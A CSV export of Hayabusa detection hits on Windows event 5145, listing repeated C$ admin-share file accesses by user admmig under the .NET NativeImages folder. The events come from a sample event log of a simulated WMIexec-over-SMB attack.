2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
